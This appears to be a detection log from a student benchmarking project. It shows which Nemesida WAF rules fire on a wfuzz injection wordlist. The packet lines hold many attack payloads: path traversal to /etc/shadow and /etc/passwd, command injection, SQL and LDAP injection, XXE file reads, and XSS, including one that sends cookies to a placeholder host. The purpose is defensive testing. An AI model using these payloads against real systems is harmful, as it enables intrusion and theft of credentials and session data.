# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l injections.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/inspectorlog/nemesida/web_estatica/security_tools_benchmarking/wfuzz/injections.clean
Packet [2]	Uri [/web/FALSE/,/web/-1/,/web/-2/,/web/-268435455/,/web/null/,/web/\0/,/web/`id`/,/web/\0\0\0/,/web/|id/,/web/id%00|/,/web/?x=|/,/web/../../../../../../../../../../../../etc/hosts%00/,/web//../../../../../../../../%2A/]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001359]	[300002407]
Packet [3]	Uri [/web/00/,/web/2/,/web/268435455/,/web/%0a/,/web/+%00/,/web/$NULL/,/web/`dir`/,/web/|ls%20-la/,/web/|dir/,/web/\n/bin/ls%20-al\n/,/web/../../boot.ini/]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001053]	[300001359]
Packet [4]	Uri [/web/0/,/web/%00/,/web/$null/,/web/|id|/,/web/|ls/,/web/?x=>/,/web/ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|/]	Nattacks [1]	Signatures	[300001359]
Packet [5]	Uri [/web/A/,/web/1/,/web/-1.0/,/web/65536/,/web/0xfffffff/,/web/NULL/,/web/\00\00\00/,/web/\0/,/web/id%00/,/web/|dir|/,/web/?x=/,/web/../../../../../../../../../../../../etc/hosts/]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001359]	[300002407]
Packet [6]	Uri [/web/1.0/,/web/\00/,/web/\00/,/web/\"blah/,/web/;ls%20-la/,/web//boot.ini/,/web//index.html|id|/,/web//../../../../../../../../../../etc/passwd^^/]	Nattacks [4]	Signatures	[300000051]	[300000057]	[300000067]	[300001559]
Packet [7]	Uri [/web/&quot;;id&quot;/,/web//etc/passwd/,/web/../../../../../../../../../../../../etc/passwd/]	Nattacks [4]	Signatures	[300000051]	[300000057]	[300000067]	[300001559]
Packet [8]	Uri [/web/;id;/,/web/../../../../../../../../../../../../etc/passwd%00/,/web/../../../../../../../../../../../../etc/shadow/]	Nattacks [5]	Signatures	[300000051]	[300000057]	[300000067]	[300001359]	[300001559]
Packet [9]	Uri [/web/;netstat%20-a;/,/web//../../../../../../../../../../etc/shadow^^/]	Nattacks [4]	Signatures	[300000051]	[300000057]	[300000067]	[300001559]
Packet [10]	Uri [/web/TRUE/,/web/-20/,/web/2147483647/,/web/<%20%20script%20>%20<%20/%20script>/,/web/\0\0/,/web/\00\00/,/web/;read;/,/web/;dir/,/web/|/bin/ls%20-al/,/web/?x="/,/web//etc/shadow/,/web/../../../../../../../../../../../../etc/shadow%00/,/web//../../../../../../../../../../etc/shadow/]	Nattacks [6]	Signatures	[300000051]	[300000057]	[300000067]	[300001053]	[300001359]	[300001559]
Packet [11]	Uri [/web/\..\..\..\..\..\..\..\..\..\..\etc\shadow/,/web//../../../../../../../../../../etc/passwd/]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300000071]	[300001559]
Packet [12]	Uri [/web//./././././././././././etc/passwd/,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow/]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300000077]	[300001559]
Packet [13]	Uri [/web/..\..\..\..\..\..\..\..\..\..\etc\passwd/,/web/.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow/,/web/%0a/bin/cat%20/etc/shadow/,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd/]	Nattacks [6]	Signatures	[300000057]	[300000066]	[300000067]	[300000071]	[300001053]	[300001559]
Packet [14]	Uri [/web//..\../..\../..\../..\../..\../..\../etc/shadow/,/web/%00../../../../../../etc/shadow/,/web/..\..\..\..\..\..\..\..\..\..\etc\shadow%00/,/web/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/,/web//../../../../../../../../bin/id|/]	Nattacks [6]	Signatures	[300000057]	[300000067]	[300000071]	[300001053]	[300001359]	[300001559]
Packet [15]	Uri [/web//./././././././././././etc/shadow/,/web//..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow/,/web//../../../../../../../../../../../etc/passwd%00.html/,/web/%0a/bin/cat%20/etc/passwd/,/web/..\..\..\..\..\..\..\..\..\..\etc\passwd%00/,/web/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%255cboot.ini/,/web//..\../..\../..\../..\../..\../..\../boot.ini/,/web//../../../../../../../../../../../boot.ini/]	Nattacks [7]	Signatures	[300000057]	[300000067]	[300000071]	[300000077]	[300001053]	[300001359]	[300001559]
Packet [16]	Uri [/web/../../../../../../../../../../../../boot.ini/]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [17]	Uri [/web/..\..\..\..\..\..\..\..\..\..\etc\shadow/,/web//../../../../../../../../../../../etc/passwd%00.jpg/,/web/%00/etc/passwd%00/,/web/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/,/web/\\&apos;/bin/cat%20/etc/shadow\\&apos;/,/web//../../../../../../../../../../../boot.ini%00.html/,/web//.\\./.\\./.\\./.\\./.\\./.\\./boot.ini/,/web/../../../../../../../../../../../../localstart.asp/]	Nattacks [8]	Signatures	[300000051]	[300000057]	[300000066]	[300000067]	[300000071]	[300001053]	[300001359]	[300001559]
Packet [18]	Uri [/web//..\../..\../..\../..\../..\../..\../etc/passwd/,/web/%00../../../../../../etc/passwd/,/web/\\&apos;/bin/cat%20/etc/passwd\\&apos;/,/web/..\..\..\..\..\..\..\..\..\..\boot.ini/,/web//../../../../../../../../../../../boot.ini%00/,/web/C:/boot.ini/,/web/../../../../../../../../conf/server.xml/]	Nattacks [8]	Signatures	[300000051]	[300000057]	[300000066]	[300000067]	[300000071]	[300001053]	[300001359]	[300001559]
Packet [19]	Uri [/web/\..\..\..\..\..\..\..\..\..\..\etc\passwd/,/web/.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd/,/web/\..\..\..\..\..\..\..\..\..\..\etc\shadow%00/,/web//..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd/,/web/%00/etc/shadow%00/,/web/\..\..\..\..\..\..\..\..\..\..\etc\passwd%00/,/web//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/,/web/C:\boot.ini/,/web/\..\..\..\..\..\..\..\..\..\..\boot.ini/,/web/../../../../../../../../../../../../boot.ini%00/,/web/C:\inetpub\wwwroot\global.asa/,/web/%01%02%03%04%0a%0d%0aADSF/,/web/%/]	Nattacks [6]	Signatures	[300000057]	[300000066]	[300000067]	[300000071]	[300001359]	[300001559]
Packet [20]	Uri [/web//../../../../../../../../../../../boot.ini%00.jpg/,/web/&lt;!--,/web//,%ENV,//]	Nattacks [6]	Signatures	[300000051]	[300000057]	[300000067]	[300000068]	[300001359]	[300001517]
Packet [21]	Uri [/web//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini/,/web/..\..\..\..\..\..\..\..\..\..\boot.ini%00/,/web//./././././././././././boot.ini/,/web/../../../../../../../../../../../../localstart.asp%00/,/web/C:/inetpub/wwwroot/global.asa/,/web/}/,/web/&lt;!--,/web/!@,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini/]	Nattacks [8]	Signatures	[300000051]	[300000057]	[300000067]	[300000068]	[300000071]	[300000077]	[300001359]	[300001517]
Packet [22]	Uri [/web/;/,/web//.../.../.../.../...//,/web/\\/,/web/\\\\*/,/web/<</,/web/&,/web/!@,/web/@'/,/web/*|/,/web/</,/web//%00//,/web/%5C//,/web/%3C%3F/,/web/..%u2215/]	Nattacks [9]	Signatures	[300000039]	[300000040]	[300000051]	[300000052]	[300000057]	[300000066]	[300000067]	[300000536]	[300001359]
Packet [23]	Uri [/web/*/,/web/&lt/,/web/\/,/web/`/,/web/&,/web/!'/,/web/{'}/,/web/--/,/web/<<</,/web/,/web/%00/,/web/%2e%2e%2f/,/web/%20/,/web/..%%35%63/]	Nattacks [6]	Signatures	[300000039]	[300000040]	[300000052]	[300000068]	[300000536]	[300001359]
Packet [24]	Uri [/web/,/web/&LT/,/web/\\//,/web/(')/,/web/"\t"/,/web/,/web//'/,/web/||/,/web/,/web/,/web/%5C/,/web/%2A/,/web/..//,/web//%2A/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/..%u2216/]	Nattacks [7]	Signatures	[300000034]	[300000039]	[300000040]	[300000052]	[300000066]	[300000067]	[300001130]
Packet [26]	Uri [/web/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini/,/web/%0d%0aX-Injection-Header:%20AttackValue/,/web///,/web/&lt;/,/web/&LT;/,/web/&,/web/%01%02%03%04%0a%0d%0aADSF/,/web/[']/,/web/^'/,/web/|/,/web/%00//,/web/%3C/,/web/<?/,/web/%250a/,/web/%2500/,/web/..\/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/..%bg%qf/]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300000067]	[300001359]
Packet [27]	Uri [/web/&,/web/&,/web/&,/web/something%00html/,/web/"><script>"/,/web/<IMG%20SRC="javascript:alert('XSS');">/,/web/<IMG%20SRC=javascript:alert(&quot;XSS&quot;)>/,/web/%3cscript%3ealert("XSS");%3c/script%3e/,/web/<IMG%20SRC=&,/web/"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>/,/web/'';!--"<XSS>=&{()}/,/web/\x23/,/web/<>"'%;)(&+/]	Nattacks [12]	Signatures	[300000051]	[300000052]	[300000068]	[300000508]	[300000515]	[300000537]	[300000550]	[300001359]	[300001497]	[300001513]	[300001879]	[300001882]
Packet [28]	Uri [/web/\\\\?\\/,/web/&,/web/\t/,/web/*'/,/web/\'/,/web/-/,/web/,/web/%00/,/web/%7C/,/web/%20|/,/web/%2C/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/..%255c/,/web/..%5c/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/\x3c/,/web/{&apos;}/,/web/^&apos;/,/web/<xss><script>alert('XSS')</script></vulnerable>/,/web/<IMG%20SRC='javascript:alert(document.cookie)'>/,/web/<IMG%20SRC=javascript:alert('XSS')>/,/web/<IMG%20SRC='javascript:alert(document.cookie)'>/,/web/<script>alert(document.cookie)</script>/,/web/<script>alert("XSS")</script>/,/web/<IMG%20SRC=&,/web/';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}/,/web/"/,/web/-/,/web/'%20--/,/web/=%20--/,/web/'%20or%20''='/,/web/"'%20or%201%20--'"/,/web/"%20or%201=1%20or%20""="/,/web/hi"%20or%20"a"="a/,/web/'hi'%20or%20'x'='x';/,/web/PRINT%20@@variable/,/web/insert/,/web/order%20by/,/web/'%20or%20username%20like%20'%/]	Nattacks [15]	Signatures	[300000033]	[300000039]	[300000051]	[300000052]	[300000066]	[300000068]	[300000508]	[300000515]	[300000537]	[300000550]	[300001005]	[300001008]	[300001359]	[300001882]	[300002819]
Packet [29]	Uri [/web/%60/,/web/..%c0%af/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/..%25%35%63/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/\x3C/,/web/*&apos;/,/web/&apos;/,/web/<IMG%20SRC="jav&,/web/<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>/,/web/<IMG%20SRC="javascript:alert('XSS')"/,/web/&ltscript&gtalert(document.cookie);</script>/,/web/'><script>alert(document.cookie);</script>/,/web/<IMG%20SRC="jav&,/web/<IMG%20DYNSRC="javascript:alert('XSS')">/,/web/<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>/,/web/'/,/web/'%20;/,/web/,/web/')%20or%20('x'='x/,/web/'%20or%20'1'='1'--/,/web/'%20or%201=1%20or%20''='/,/web/"%20or%20"a"="a/,/web/hi'%20or%201=1%20--/,/web/or/,/web/PRINT/,/web/'%20or%20uname%20like%20'%/]	Nattacks [13]	Signatures	[300000039]	[300000051]	[300000052]	[300000068]	[300000069]	[300000508]	[300000515]	[300000537]	[300000550]	[300001063]	[300001497]	[300001882]	[300002819]
Packet [30]	Uri [/web/&,/web/&,/web/&,/web/&,/web/&,/web/\u003C/,/web/[&apos;]/,/web/,/web/<IMG%20SRC=`javascript:alert("'XSS'")`>/,/web/&ltscript&gtalert(document.cookie);&ltscript&gtalert/,/web/%3cscript%3ealert(document.cookie);%3c%2fscript%3e/,/web/">xxx<P>yyy/,/web/'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E/,/web/<IMG%20LOWSRC="javascript:alert('XSS')">/,/web/%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E/,/web/=%20;/,/web/admin'--/,/web/"%20or%20"x"="x/,/web/"%20or%201=1--/,/web/hi'%20or%20'a'='a/,/web/'%20or%20a=a--/,/web/,@variable/,/web/bfilename/,/web/'%20or%20userid%20like%20'%/]	Nattacks [12]	Signatures	[300000051]	[300000052]	[300000053]	[300000068]	[300000508]	[300000515]	[300000537]	[300000550]	[300001134]	[300001497]	[300001879]	[300001882]
Packet [31]	Uri [/web/&,/web/&,/web/&,/web//&apos;/,/web/'><script>alert(document.cookie)</script>/,/web/<IMG%20SRC=JaVaScRiPt:alert('XSS')>/,/web/\";alert('XSS');///,/web/--';/,/web/\x27\x4F\x52%20SELECT%20*/,/web/'%20or%20'x'='x/,/web/"%20or%200=0%20,/web/')%20or%20('a'='a/,/web/hi")%20or%20("a"="a/,/web/'%20or%20uid%20like%20'%/]	Nattacks [12]	Signatures	[300000040]	[300000051]	[300000052]	[300000053]	[300000068]	[300000508]	[300000515]	[300000537]	[300000550]	[300001134]	[300001497]	[300001879]
Packet [32]	Uri [/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/\u003c/,/web/@&apos;/,/web/\&apos;/,/web/<IMG%20SRC="jav&,/web/<IMG%20"""><SCRIPT>alert("XSS")</SCRIPT>">/,/web/<IMG%20SRC="javascript:alert('XSS');">/,/web/%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E/,/web/<<script>alert("XSS");//<</script>/,/web/<IMG%20SRC=&,/web/<IMG%20SRC="%20&,/web//,/web/--/,/web/\x27/,/web/0%20or%201=1/,/web/or%200=0%20,/web/hi"%20or%201=1%20--/,/web/")%20or%20("a"="a/,/web/as/,/web/select/,/web/update/,/web/handler/,/web/'%20or%20user%20like%20'%/]	Nattacks [11]	Signatures	[300000051]	[300000052]	[300000068]	[300000508]	[300000515]	[300000536]	[300000537]	[300001001]	[300001007]	[300001497]	[300001882]
Packet [33]	Uri [/web/&,/web/=%20'/,/web/'or%20select%20*/,/web/'%20or%200=0%20--/,/web/"%20or%200=0%20--/,/web/hi')%20or%20('a'='a/,/web/@variable/,/web/like/,/web/exec%20xp/,/web/';%20exec%20master..xp_cmdshell/,/web/limit/,/web/\x27UNION%20SELECT/,/web/'%20or%20(EXISTS)/,/web/&lt;&gt;&quot;'%;)(&amp;+/]	Nattacks [7]	Signatures	[300000040]	[300000051]	[300000052]	[300000068]	[300001006]	[300001007]	[300001491]
Packet [34]	Uri [/web/\x3D%20\x27/,/web/'%20or%200=0%20,/web/procedure/,/web/replace/,/web/truncate/,/web/asc/,/web/'%20(select%20top%201/,/web/'||UTL_HTTP.REQUEST/,/web/%27%20or%201=1/,/web/%20$(sleep%2050)/,/web/%29/,/web/'%20or%201=1%20or%20''='/,/web/%2A%28%7C%28objectclass%3D%2A%29%29/,/web/*(|(mail=*))/,/web/*/*/,/web/x'%20or%20name()='username'%20or%20'x'='y/,/web/<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file:////dev/random">]><foo>&xxe;</foo>/]	Nattacks [15]	Signatures	[300000036]	[300000039]	[300000040]	[300000051]	[300000052]	[300000053]	[300000508]	[300001007]	[300001010]	[300001040]	[300001056]	[300001130]	[300001497]	[300001840]	[300002806]
Packet [35]	Uri [/web/\x27\x6F\x72%20SELECT%20*/,/web/or%200=0%20--/,/web/or%201=1--/,/web/exec%20sp/,/web/having/,/web/';%20exec%20xp_regread/,/web/tz_offset/,/web/'%20UNION%20ALL%20SELECT/,/web/char%4039%41%2b%40SELECT/,/web/&apos;%20OR/,/web/&/,/web/'%20or%20''='/,/web/*(|(objectclass=*))/,/web/%7C/,/web/count(/child::node())/,/web/<![CDATA[<script>var%20n=0;while(true){n++;}</script>]]>/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file://c:/boot.ini">]><foo>&xxe;</foo>/,/web/<xml%20ID="xss"><I><B>&lt;IMG%20SRC="javas<!--%20-->cript:alert('XSS')"&gt;</B></I></xml><SPAN%20DATASRC="]	Nattacks [14]	Signatures	[300000039]	[300000040]	[300000051]	[300000052]	[300000053]	[300000068]	[300000508]	[300000515]	[300000537]	[300001012]	[300001096]	[300001491]	[300001497]	[300001840]
Packet [36]	Uri [/web/\x3D%20\x3B'/,/web/'%20or%201=1--/,/web/or%201=1%20--/,/web/delete/,/web/t'exec%20master..xp_cmdshell%20'nslookup%20www.google.com'--/,/web/to_timestamp_tz/,/web/--sp_password/,/web/%20'sleep%2050'/,/web/(sqlattempt2)/,/web/%26/,/web/%28/,/web/%2A%28%7C%28mail%3D%2A%29%29/,/web/'sqlattempt1/,/web///*/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><foo><![CDATA['%20or%201=1%20or%20''=']]></foo>/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file:////etc/shadow">]><foo>&xxe;</foo>/,/web/<HTML%20xmlns:xss><?import%20namespace="xss"%20implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>/]	Nattacks [14]	Signatures	[300000039]	[300000040]	[300000051]	[300000052]	[300000053]	[300000068]	[300001040]	[300001063]	[300001130]	[300001491]	[300001559]	[300001840]	[300002760]	[300002806]
Packet [37]	Uri [/web/or%201=1/,/web/distinct/,/web/1;SELECT%20*/,/web/'%20UNION%20SELECT/,/web/'%20or%201=1/,/web/%2A%7C/,/web/!/,/web/(/,/web///,/web/@*/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>/,/web/<xml%20ID=I><X><C><![CDATA[<IMG%20SRC="javas]]><![CDATA[cript:alert('XSS');">]]>/,/web/<xml%20SRC="xsstest.xml"%20ID=I></xml><SPAN%20DATASRC=]	Nattacks [7]	Signatures	[300000039]	[300000040]	[300000051]	[300000052]	[300000053]	[300000508]	[300001130]
Packet [38]	Uri [/web/desc/,/web/)/,/web/%21/,/web/x'%20or%201=1%20or%20'x'='y/,/web/*|/,/web/|/,/web/<name>',''));%20phpinfo();%20exit;/*</name>/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file:////etc/passwd">]><foo>&xxe;</foo>/]	Nattacks [7]	Signatures	[300000039]	[300000051]	[300000052]	[300000053]	[300001559]	[300001840]	[300001871]
# N. packets [39], [36] with alerts, N. Alerts [266]
# Execution time: 0.074283 s
